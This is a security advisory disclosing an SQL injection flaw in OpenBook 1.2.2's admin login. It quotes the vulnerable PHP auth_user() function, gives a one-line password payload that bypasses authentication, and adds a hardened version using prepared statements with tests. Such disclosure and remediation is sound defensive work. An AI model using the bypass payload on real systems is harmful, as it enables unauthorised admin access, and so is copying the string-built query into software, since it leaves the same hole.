[SVadvisory] - SQL injection in OpenBook 1.2.2

2005-08-02T00:00:00
ID SECURITYVULNS:DOC:9360
Type securityvulns
Reporter Securityvulns
Modified 2005-08-02T00:00:00

Description

SVadvisory#12
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Title: SQL injection
Product: OpenBook
Version: 1.2.2
Site: http://openbook.sourceforge.net/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerabilities


Code:

function auth_user($userid, $password)
{
    global $HTTP_POST_VARS;
    global $admin_table;

    $userid=$HTTP_POST_VARS['userid'];
    $password=$HTTP_POST_VARS['password'];

    db_connect();

    $query="SELECT userid "
          ."FROM $admin_table "
          ."WHERE userid='$userid' AND password=password('$password')";
    $result=mysql_query($query);

    if(!mysql_num_rows($result))
    // no matches
    {
        return 0;
    }
    else
    // match found so return userid
    {
        $query_data=mysql_fetch_array($result);
        return $query_data['userid'];
    }

}// end auth_user()

The variables $userid and $password in admin.php are not checked before being placed into the SQL query. This makes SQL injection possible, after which any user can gain access to the admin panel.

Here is a simple example of such a substitution:

User ID: admin
Password: no') or 1/*
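
A hardened form of auth_user(), as an added example that is not part of the original advisory or of OpenBook's code: the query uses a bound placeholder, and the password is checked with password_verify() against a stored hash instead of being passed to MySQL's password(). It assumes PDO with the pdo_sqlite driver (an in-memory database stands in for MySQL), a hypothetical table named admin, and a constructed account.

```php
<?php
// Added example, not OpenBook code. Assumptions: PDO with the pdo_sqlite
// driver, a hypothetical table "admin", and a constructed admin account.

function auth_user(PDO $db, string $userid, string $password)
{
    // The table name is a fixed literal: identifiers cannot be bound as
    // parameters, so it must never be built from request data.
    // The placeholder keeps $userid as data; it cannot alter the query text.
    $stmt = $db->prepare(
        'SELECT userid, password FROM admin WHERE userid = :userid'
    );
    $stmt->execute([':userid' => $userid]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // The password is compared in PHP against the stored hash, so it never
    // reaches the SQL layer at all.
    if ($row === false || !password_verify($password, $row['password'])) {
        return 0;            // no match, same return value as the original
    }
    return $row['userid'];   // match found so return userid
}

// Constructed test data in an in-memory database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE admin (userid TEXT PRIMARY KEY, password TEXT NOT NULL)');
$ins = $db->prepare('INSERT INTO admin (userid, password) VALUES (?, ?)');
$ins->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT)]);

// The advisory's input is treated as an ordinary (wrong) password.
var_dump(auth_user($db, 'admin', "no') or 1/*"));
// The same characters in the user ID field are just a non-existent user.
var_dump(auth_user($db, "admin' or 1/*", 'anything'));
// The real credentials still authenticate.
var_dump(auth_user($db, 'admin', 'correct horse'));
```

With a MySQL DSN in place of sqlite::memory: the function body is unchanged; existing rows hashed with password() would need to be re-hashed with password_hash() when each user next logs in or resets a password.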


Bug Found



Search Vulnerabilities Team - www.svt.nukleon.us